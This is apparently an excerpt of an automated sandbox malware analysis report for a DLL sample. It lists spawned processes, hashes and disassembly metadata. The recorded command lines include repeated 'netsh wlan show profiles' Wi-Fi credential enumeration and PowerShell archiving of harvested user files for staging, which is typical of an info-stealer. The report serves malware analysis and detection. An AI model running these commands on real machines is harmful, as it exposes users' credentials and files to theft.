                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1
                              Imagebase:0x860000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:netsh wlan show profiles
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:6
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:7
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:netsh wlan show profiles
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:12:47:05
                              Start date:27/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:10
                              Start time:12:47:05
                              Start date:27/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:11
                              Start time:12:47:05
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:12
                              Start time:12:47:05
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:13
                              Start time:12:47:06
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Save
                              Imagebase:0x860000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:14
                              Start time:12:47:09
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Main
                              Imagebase:0x860000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:15
                              Start time:12:47:09
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Save
                              Imagebase:0x860000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:16
                              Start time:12:47:09
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:netsh wlan show profiles
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:17
                              Start time:12:47:09
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:18
                              Start time:12:47:11
                              Start date:27/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:19
                              Start time:12:47:11
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Disassembly

                              Reset < >

                                Executed Functions

                                Function 00007FFD9B8B55CD Relevance: .4, Instructions: 424COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.1911382103.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e57f63e4c2fb0a4e7a33aece0a6277bd2445b5369f797491d393aeb3679df23a
                                • Instruction ID: 0cd30bce06e593c5e677f914553a8708a6773bc2676cf6b0792bc0886408c9e6
                                • Opcode Fuzzy Hash: e57f63e4c2fb0a4e7a33aece0a6277bd2445b5369f797491d393aeb3679df23a
                                • Instruction Fuzzy Hash: 83D10822B0FBDA0FE766977858754E57FA0EF5622070A01FBD098CB0E7E9186D098791
                                Function 00007FFD9B8BC78A Relevance: .4, Instructions: 391COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.1911382103.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90cd9da1311de1ff9ea48b7f75db95ca283b48f5e008c63c431f1c968d586c4f
                                • Instruction ID: ddfdf0bd6049fb9abaa0129d59cf00f470917e438e728e9bf424a75ac3bafc10
                                • Opcode Fuzzy Hash: 90cd9da1311de1ff9ea48b7f75db95ca283b48f5e008c63c431f1c968d586c4f
                                • Instruction Fuzzy Hash: 07C15872B0EA9E1FEB69DB7848295B57BD1EF49354F0500BAD05DC70E3DE18AD018B80
                                Function 00007FFD9B8B572D Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.1911382103.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: accdbfc6c5ace2aa6baa26d09879bf9317777f901b8b806739d275ab583eb09b
                                • Instruction ID: 79e1ff05aca54aae26652ad12bbad129955f803f92835f24549e54bf2825638a
                                • Opcode Fuzzy Hash: accdbfc6c5ace2aa6baa26d09879bf9317777f901b8b806739d275ab583eb09b
                                • Instruction Fuzzy Hash: B921A562A0FBD54FD7679B784C755957FB0EF4722070A02FAD0E5CB0E3D91868068751
                                Function 00007FFD9B7E33B5 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.1908230275.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_7ffd9b7e0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                • Instruction ID: 347eb46863d0610c54c5e9c05e70889870b2352b4ba84a369cc0dc72dc0b729b
                                • Opcode Fuzzy Hash: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                • Instruction Fuzzy Hash: 6D01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10056DE58AC36A1DA32E882CB41